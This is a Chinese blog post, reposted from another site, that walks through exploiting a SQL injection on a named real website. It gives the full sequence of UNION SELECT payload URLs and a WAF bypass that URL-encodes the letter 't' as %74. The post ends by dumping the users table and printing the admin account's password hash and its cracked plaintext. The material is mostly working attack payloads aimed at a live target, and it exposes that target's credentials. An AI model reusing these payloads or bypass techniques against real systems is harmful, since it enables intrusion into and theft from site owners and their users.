php 编码绕过,WAF绕过方法之URL编码 | CN-SEC 中文网

实例讲解如何利用URL编码绕过WAF防护

20130507125331671-300x189.jpg

SQL注入点

http://www.magrabiyemen.com/contents.php?id=3

字段数为4

http://www.magrabiyemen.com/contents.php?id=3 order by 4

显示位为4

http://www.magrabiyemen.com/contents.php?id=3 union select 1,2,3,4

显示基本信息正常

20130510020517172-300x47.jpg

http://www.magrabiyemen.com/contents.php?id=3 UNION SELECT 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version())

暴表的时候出现not acceptable

20130510020601637-300x55.jpg

http://www.magrabiyemen.com/contents.php?id=3 UNION SELECT 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()

尝试绕过,不成功,依然返回上图所示

http://www.magrabiyemen.com/contents.php?id=3 /*!12345UNION*/ /*!12345SELECT*/ 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()

使用URL编码成功绕过(t经过URL编码后为%74)

http://www.magrabiyemen.com/contents.php?id=3 UNION SELECT 1,2,3,group_concat(%74able_name) from informa%74ion_schema.tables where %74able_schema=da%74abase()

20130510020803360-300x38.jpg

http://www.magrabiyemen.com/contents.php?id=3 UNION SELECT 1,2,3,group_concat(column_name) from informa%74ion_schema.columns where table_name=CHAR(117, 115, 101, 114, 115)

20130510020825331-300x36.jpg

http://www.magrabiyemen.com/contents.php?id=3 UNION SELECT 1,2,3,group_concat(username,0x3a,password) from users

20130510020846515-300x57.jpg

admin:ea4ce35c2860112178e8ae2285579919

解密出来为:admin/123456789987654321

from www.waitalone.cn.thanks for it.

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值